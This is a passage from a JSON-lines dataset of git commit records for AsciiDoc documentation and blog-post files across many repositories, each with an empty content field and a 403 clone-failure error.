2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","message":"Update 2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","new_file":"_posts\/2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ae161198f8dffca4ef6c3405fadf6be16ceb1be","subject":"Update 2016-02-05-A-few-introductions-are-in-order.adoc","message":"Update 
2016-02-05-A-few-introductions-are-in-order.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-05-A-few-introductions-are-in-order.adoc","new_file":"_posts\/2016-02-05-A-few-introductions-are-in-order.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89421853750e79aececbc702e7743853f36cb92e","subject":"y2b create post They Say It's The World's Smallest...","message":"y2b create post They Say It's The World's Smallest...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-28-They-Say-Its-The-Worlds-Smallest.adoc","new_file":"_posts\/2017-06-28-They-Say-Its-The-Worlds-Smallest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f7841b894aa009c913ad202eabe660e5dd29c9b","subject":"MAMs sample for creating master clips","message":"MAMs sample for creating master clips\n","repos":"Cinegy\/Demo,Cinegy\/Demo,Cinegy\/Demo","old_file":"MAMs.Samples\/CreateMasterClip.asciidoc","new_file":"MAMs.Samples\/CreateMasterClip.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cinegy\/Demo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"237dc1fa4d6f6e1ecb6ea571f2d6db72c99d903c","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ced02859d55163884b845710bae580e2cdd2288f","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69df7d388b2c32482c32b4271e4b7e2a4ac6f2ac","subject":"Component docs","message":"Component 
docs\n","repos":"punkhorn\/camel-upstream,apache\/camel,davidkarlsen\/camel,jamesnetherton\/camel,akhettar\/camel,gnodet\/camel,zregvart\/camel,objectiser\/camel,tadayosi\/camel,anton-k11\/camel,gautric\/camel,DariusX\/camel,cunningt\/camel,tlehoux\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,adessaigne\/camel,gnodet\/camel,tadayosi\/camel,mcollovati\/camel,pmoerenhout\/camel,kevinearls\/camel,adessaigne\/camel,kevinearls\/camel,tadayosi\/camel,objectiser\/camel,anton-k11\/camel,christophd\/camel,isavin\/camel,pmoerenhout\/camel,pkletsko\/camel,rmarting\/camel,acartapanis\/camel,drsquidop\/camel,curso007\/camel,davidkarlsen\/camel,pmoerenhout\/camel,jamesnetherton\/camel,yuruki\/camel,alvinkwekel\/camel,snurmine\/camel,christophd\/camel,CodeSmell\/camel,drsquidop\/camel,apache\/camel,jamesnetherton\/camel,pkletsko\/camel,Thopap\/camel,curso007\/camel,anton-k11\/camel,snurmine\/camel,adessaigne\/camel,jonmcewen\/camel,drsquidop\/camel,anoordover\/camel,anoordover\/camel,tlehoux\/camel,christophd\/camel,tlehoux\/camel,nikhilvibhav\/camel,nboukhed\/camel,acartapanis\/camel,mgyongyosi\/camel,christophd\/camel,zregvart\/camel,Thopap\/camel,davidkarlsen\/camel,curso007\/camel,dmvolod\/camel,kevinearls\/camel,jonmcewen\/camel,onders86\/camel,rmarting\/camel,nboukhed\/camel,curso007\/camel,dmvolod\/camel,scranton\/camel,yuruki\/camel,tdiesler\/camel,Fabryprog\/camel,zregvart\/camel,gnodet\/camel,salikjan\/camel,mcollovati\/camel,pkletsko\/camel,ullgren\/camel,yuruki\/camel,tlehoux\/camel,alvinkwekel\/camel,nboukhed\/camel,gnodet\/camel,akhettar\/camel,DariusX\/camel,nicolaferraro\/camel,Thopap\/camel,salikjan\/camel,tdiesler\/camel,scranton\/camel,Thopap\/camel,akhettar\/camel,gautric\/camel,alvinkwekel\/camel,acartapanis\/camel,kevinearls\/camel,yuruki\/camel,pax95\/camel,pkletsko\/camel,punkhorn\/camel-upstream,mgyongyosi\/camel,dmvolod\/camel,onders86\/camel,adessaigne\/camel,pkletsko\/camel,acartapanis\/camel,onders86\/camel,anoordover\/camel,pax95\/camel,pmoerenhout\/camel,isavin\/camel,prashant2402\/camel,apache\/camel,nboukhed\/camel,gautric\/camel,nicolaferraro\/camel,tdiesler\/camel,onders86\/camel,mgyongyosi\/camel,jonmcewen\/camel,ullgren\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,tdiesler\/camel,Fabryprog\/camel,nikhilvibhav\/camel,rmarting\/camel,cunningt\/camel,scranton\/camel,mgyongyosi\/camel,sverkera\/camel,prashant2402\/camel,rmarting\/camel,prashant2402\/camel,pax95\/camel,Fabryprog\/camel,rmarting\/camel,nicolaferraro\/camel,pmoerenhout\/camel,christophd\/camel,sverkera\/camel,drsquidop\/camel,objectiser\/camel,pmoerenhout\/camel,cunningt\/camel,anton-k11\/camel,CodeSmell\/camel,scranton\/camel,pkletsko\/camel,adessaigne\/camel,jonmcewen\/camel,onders86\/camel,CodeSmell\/camel,nboukhed\/camel,isavin\/camel,snurmine\/camel,cunningt\/camel,mcollovati\/camel,sverkera\/camel,mgyongyosi\/camel,onders86\/camel,akhettar\/camel,prashant2402\/camel,gnodet\/camel,isavin\/camel,anton-k11\/camel,jamesnetherton\/camel,prashant2402\/camel,gautric\/camel,jamesnetherton\/camel,yuruki\/camel,Thopap\/camel,davidkarlsen\/camel,curso007\/camel,tadayosi\/camel,isavin\/camel,curso007\/camel,mcollovati\/camel,scranton\/camel,anton-k11\/camel,dmvolod\/camel,tdiesler\/camel,Fabryprog\/camel,akhettar\/camel,isavin\/camel,cunningt\/camel,rmarting\/camel,jonmcewen\/camel,punkhorn\/camel-upstream,apache\/camel,acartapanis\/camel,sverkera\/camel,kevinearls\/camel,objectiser\/camel,mgyongyosi\/camel,sverkera\/camel,DariusX\/camel,anoordover\/camel,Thopap\/camel,DariusX\/camel,gautric\/camel,sverke
ra\/camel,apache\/camel,anoordover\/camel,dmvolod\/camel,akhettar\/camel,scranton\/camel,acartapanis\/camel,tlehoux\/camel,tdiesler\/camel,nboukhed\/camel,CodeSmell\/camel,anoordover\/camel,cunningt\/camel,christophd\/camel,apache\/camel,tadayosi\/camel,prashant2402\/camel,tadayosi\/camel,nicolaferraro\/camel,drsquidop\/camel,ullgren\/camel,yuruki\/camel,snurmine\/camel,snurmine\/camel,zregvart\/camel,kevinearls\/camel,dmvolod\/camel,nikhilvibhav\/camel,drsquidop\/camel,pax95\/camel,ullgren\/camel,alvinkwekel\/camel,tlehoux\/camel,gautric\/camel,snurmine\/camel,punkhorn\/camel-upstream,jonmcewen\/camel","old_file":"components\/camel-spring-dm\/src\/main\/docs\/spring-dm.adoc","new_file":"components\/camel-spring-dm\/src\/main\/docs\/spring-dm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63fdc0c9f49e55ac043c9ba25e9b755b696d405d","subject":"[docs] Python updates for development page","message":"[docs] Python updates for development page\n\nUpdates to the Developing Applications with Kudu page for Python.\nAdditionally, this updates some of the github example references.\n\nChange-Id: I028e86b6bc35f36fd1a4752b52463f5d0fd75f76\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4586\nReviewed-by: David Ribeiro Alves <78b9f953b197533e9b51c860b080869056433b48@apache.org>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a7f6e693b6df63d8d9671030c794a59bf3679b17","subject":"zsh: Add an `installation` section to the readme","message":"zsh: Add an `installation` section to the readme\n\nThis section explains how to install the configuration and what steps to\ntake in order to work with other configurations (such as creating the\n$HOME\/.config folder first so the .config\/zsh folder is linked\ncorrectly).\n","repos":"PigeonF\/.dotfiles","old_file":"zsh\/README.adoc","new_file":"zsh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac7cf6a1eeca37f88f0c7a7a95496ecd3c1abe0c","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 
2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a4ca17290d386f9c91baa9002ac02cccd8e5a4d","subject":"add MIT license","message":"add MIT license\n","repos":"mattdrees\/patchkit","old_file":"LICENSE.asciidoc","new_file":"LICENSE.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattdrees\/patchkit.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9eb5ae5ac06502e12d3085730c033c7eb1425680","subject":"Create Vim.adoc","message":"Create Vim.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Windows\/Vim.adoc","new_file":"Windows\/Vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a57bdad3e4aa3c105c2b8158b835fd4108bdd0ba","subject":"Add CHANGELOG starting with v0.0.9 release.","message":"Add CHANGELOG starting with v0.0.9 release.","repos":"msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msgilligan\/bitcoinj-addons.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0ca7d0ceb8b61fa3ef27ed776ced81467d0d40f4","subject":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e083df4daf714102bf5f658adcedc336a2459f5","subject":"Update 2012-11-09-google-cloud-endpoints.adoc","message":"Update 2012-11-09-google-cloud-endpoints.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2012-11-09-google-cloud-endpoints.adoc","new_file":"_posts\/2012-11-09-google-cloud-endpoints.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"687337b893a5822ac52380309aad789d392f2239","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 
2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbe6593c4bb97e01b2f5726c68f77c3a4d406a06","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"380b45b96590a313507f26ff2b0e3a2af54f4706","subject":"Improve docs for search preferences (#32159)","message":"Improve docs for search preferences (#32159)\n\nToday it is unclear what guarantees are offered by the search preference\r\nfeature, and we claim a guarantee that is stronger than what we really offer:\r\n\r\n> A custom value will be used to guarantee that the same shards will be used\r\n> for the same custom value.\r\n\r\nThis commit clarifies this documentation.\r\n\r\nForward-port of #32098 to `master`.","repos":"GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/search\/request\/preference.asciidoc","new_file":"docs\/reference\/search\/request\/preference.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75ac029f5a8f18ff42ef33644876f063e9981031","subject":"Fix wrong method name in Grid docs (#10171)","message":"Fix wrong method name in Grid docs 
(#10171)\n\n","repos":"asashour\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework","old_file":"documentation\/components\/components-grid.asciidoc","new_file":"documentation\/components\/components-grid.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"646410e9079220e26b39eacb954f8bb1c995f319","subject":"Update 2016-02-20-Test-Blog-using-Ascii-Doctor.adoc","message":"Update 2016-02-20-Test-Blog-using-Ascii-Doctor.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2016-02-20-Test-Blog-using-Ascii-Doctor.adoc","new_file":"_posts\/2016-02-20-Test-Blog-using-Ascii-Doctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e12553f276f6e6d1b0fbe57af926456c13645c8e","subject":"Update 2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","message":"Update 2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","new_file":"_posts\/2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d67076dc603c9b51e96cb1550eedb784b0629b99","subject":"Removing colors from reports","message":"Removing colors from reports\n","repos":"korczis\/gooddata-ruby-examples,korczis\/gooddata-ruby-examples","old_file":"08_working_with_reports\/resetting_color_mapping.asciidoc","new_file":"08_working_with_reports\/resetting_color_mapping.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korczis\/gooddata-ruby-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61f7ac646d2bc0b477e17f1671e74fd13fbe412e","subject":"Update 2016-09-innovation-Engineer-Aruaru.adoc","message":"Update 2016-09-innovation-Engineer-Aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-innovation-Engineer-Aruaru.adoc","new_file":"_posts\/2016-09-innovation-Engineer-Aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bc9948d36b2965d10e4632be9c8300b05756a56","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update 
Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb9f3b9e782fa7d728e4a3f4d214442b959b38ae","subject":"Update 2017-03-15-WISSENSCHAFT-PUBLIKATION.adoc","message":"Update 2017-03-15-WISSENSCHAFT-PUBLIKATION.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-03-15-WISSENSCHAFT-PUBLIKATION.adoc","new_file":"_posts\/2017-03-15-WISSENSCHAFT-PUBLIKATION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75d303085dbdcc9dc4fb6314c5b0b68fc9a029dd","subject":"y2b create post Samsung Galaxy S8 Review","message":"y2b create post Samsung Galaxy S8 Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-08-Samsung-Galaxy-S8-Review.adoc","new_file":"_posts\/2017-04-08-Samsung-Galaxy-S8-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5ec0fa303539ff4327cea61859c444bc81f52bb","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f41fb745b8a93e5e759c685499b238ce0794960","subject":"y2b create post Unboxing The Ultra Rare Nintendo Jordans (The Buttons Actually Click!)","message":"y2b create post Unboxing The Ultra Rare Nintendo Jordans (The Buttons Actually Click!)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-19-Unboxing-The-Ultra-Rare-Nintendo-Jordans-The-Buttons-Actually-Click.adoc","new_file":"_posts\/2017-08-19-Unboxing-The-Ultra-Rare-Nintendo-Jordans-The-Buttons-Actually-Click.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b82b304b73274c4125354ed560d5b75831ef6f3","subject":"Update 
2017-05-06-Migrate-Images-to-Sonata-Media.adoc","message":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94b19bb38e10d09fb31670e2dd21eb595289fa1a","subject":"Update 2017-03-15-Hadoop-un-etat-des-lieux.adoc","message":"Update 2017-03-15-Hadoop-un-etat-des-lieux.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2017-03-15-Hadoop-un-etat-des-lieux.adoc","new_file":"_posts\/2017-03-15-Hadoop-un-etat-des-lieux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0761824cb2a1d6759b2b48bcd8b8591212fb5f8a","subject":"Kafka Json Webflux","message":"Kafka Json Webflux\n","repos":"mikrethor\/blog,mikrethor\/blog,mikrethor\/blog","old_file":"_posts\/2022-07-17-Kafka-Json-Serialization.adoc","new_file":"_posts\/2022-07-17-Kafka-Json-Serialization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikrethor\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57075f5fbcaaefdddad4c60ec936087dbc59bafa","subject":"Vorgehen Verf\u00fcgbarkeit hinzugef\u00fcgt","message":"Vorgehen Verf\u00fcgbarkeit hinzugef\u00fcgt\n","repos":"arc42\/quality-requirements","old_file":"src\/asciidoc\/05_zuverlaessigkeit_herangehensweise_verfuegbarkeit.adoc","new_file":"src\/asciidoc\/05_zuverlaessigkeit_herangehensweise_verfuegbarkeit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arc42\/quality-requirements.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed0ac7682079ae16b7d4a6f3199358e2ea8ce4c9","subject":"Delete the file at '_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc'","message":"Delete the file at '_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23c9f248c07cbb621a18259cecf8d4dc6e0db2c0","subject":"Update 2018-06-24-Laravel56-Request.adoc","message":"Update 
2018-06-24-Laravel56-Request.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff535b521ec2cc80f4b430bf1feee842a3691f37","subject":"docs: clarify disk failure recovery administration","message":"docs: clarify disk failure recovery administration\n\nThis patch aims to clarify the disk failure scenarios that are currently\nhandled and what to do when one is encountered.\n\nFor a rendered version, see here:\nhttps:\/\/github.com\/andrwng\/kudu\/blob\/df_docs\/docs\/administration.adoc#disk_failure_recovery\n\nNote: the configuration link goes to a .html page instead 